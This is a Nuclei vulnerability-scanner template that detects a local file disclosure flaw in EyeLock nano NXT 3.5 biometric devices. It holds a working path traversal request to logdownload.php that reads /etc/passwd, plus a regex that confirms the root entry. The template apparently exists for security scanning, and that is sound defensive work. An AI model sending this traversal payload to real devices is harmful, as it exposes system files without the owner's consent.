id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Local File Disclosure
  description:
  author: geeknik
  reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
  severity: high
  tags: eyelock,lfd,traversal,iot,biometrics

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
